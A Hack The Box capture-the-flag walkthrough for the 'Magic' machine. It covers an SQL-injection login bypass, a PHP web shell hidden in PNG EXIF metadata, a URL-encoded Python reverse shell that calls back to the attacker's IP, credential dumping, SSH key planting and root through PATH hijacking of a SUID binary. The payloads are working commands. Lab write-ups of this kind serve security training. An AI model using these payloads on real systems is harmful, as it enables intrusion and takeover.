Magic — HTB walkthrough
Today we will see how to own Magic machine. Initially when I started the machine I thought it is going to be related to magic numbers in PHP and something related to juggling concept. But no, it was not like that, so let’s see how was it.
ENUMERATE
Nmap scan
Port 80 HTTP Enumeration
we see a login page
First I thought it was something related to magic numbers and tried to bypass it using same hash method. But that was not the case. So, after a lot of enumeration I found SQL injection worked on Username field
First capture the request on burp
We can see we get 200 OK HTTP response code but Alert for wrong username or password. So we will fuzz with username password field here.
Reference string
admin’# worked for me. Looking at the burp request
We get 302 found and we get successfully logged in using this on login page
Post login we see, an upload option. Trying to upload abcd.php
Shows us an error , which says what type of file format is required.
I captured upload request on burp and tried to make changes like content-type to applications/x-php, or image name to something like abcd.php.png , or content starting with format type bytes like , png or GIF98 etc. But none worked. This was because the first few bytes of image i.e. it’s header was checked to decide whether this was a legitimate or illegitimate image type.
So I decided to embed payload in comments in meta-data of a legitimate image. To do this I used exiftool. ExifTool is a free and open-source software program for reading, writing, and manipulating image, audio, video, and PDF metadata. It is platform independent, available as both a Perl library and command-line application. To do this I downloaded exiftool in kali.
Then make changes to an image file using the same. To accomplish this we will do following things.
1) download any png file.
2) use exiftool to add comment to it
3) add data/payload to give reverse shell
#exiftool -Comment=’<?php echo “<pre>”; system($_GET[‘cmd’]); ?>’ exploit.png#cp exploit.png exploit.php.png
Now upload this exploit.php.png
Now we need the folder and a path to access our image. To do this we will run a gobuster scan on magic.
We get folder images. But we need something like Upload directory. So re-iterating through images
So our file is in this path : 10.10.10.185/images/uploads/exploit.php.png
EXPLOITATION
We will access the image and get a reverse shell using cmd parameter we added in our payload.
Using pentestmonkey reverse shell cheatsheet, we will use python reverse shell. Also don’t forget to change your IP and listening port and URL encoding it, before sending to URL in cmd parameter. The request looks as follows.
http://10.10.10.185/images/uploads/exploit.php.png?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.16%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27Please see — we are using python3 not python. This was trial and error, didn’t get python working so tried python3.
Keeping netcat on
Getting user
Enumerating through the files. I found database file that is called to authenticate. We see credentials.
Username : theseus | Password : iamkingtheseus. When I tried to switch user , I could not do it with this password. Enumerated a lot, cannot find any different password.
So I decided to connect through mysql, using the above creds.
Mysql wasn’t installed. Mysqldump was which worked for us
We get another password.
Now switching user worked.
Now we are theseus on box.
PRIVILEGE ESCALATION
Enumerating we see user theseus, have suid priv on /usr/bin/sysinfo
Going to location
On checking what do we have inside. We see fdisk command is called.
The fdisk command-line utility provides disk-partitioning functions . We will exploit it.
We will add a reverse shell script to the fdisk command and so instead of listing partitions, fdisk will give us reverse shell on being called via sysinfo as root.
First let’s take ssh based shell of theseus , just for sake of easy editing of files. For this on your machine, generate an RSA keypair.
On target machine, copy your public keys to authorized_keys in theseus ssh directory.
We are actually adding our public key to authorized_keys of theseus. And then use our private key to get ssh into theseus
On your machine
Logic to gain shell as root.
After you get ssh shell. Make a file named fdisk , give it permissions , change PATH variable to pwd(present working directory) and execute sysinfo.
This will give reverse shell, because once sysinfo runs, when it reaches line fdisk -l, it will search for command fdisk and it will find our fdisk, instead of /bin/fdisk due to PATH variable set up by us. And in fdisk we have reverse shell code ready to execute.
To do this, keep netcat listener on , on your machine at the port you like. Then on target machine, make following changes.
Once you see program stops at fdisk location, you will find shell on nc.
ROOTED!!!
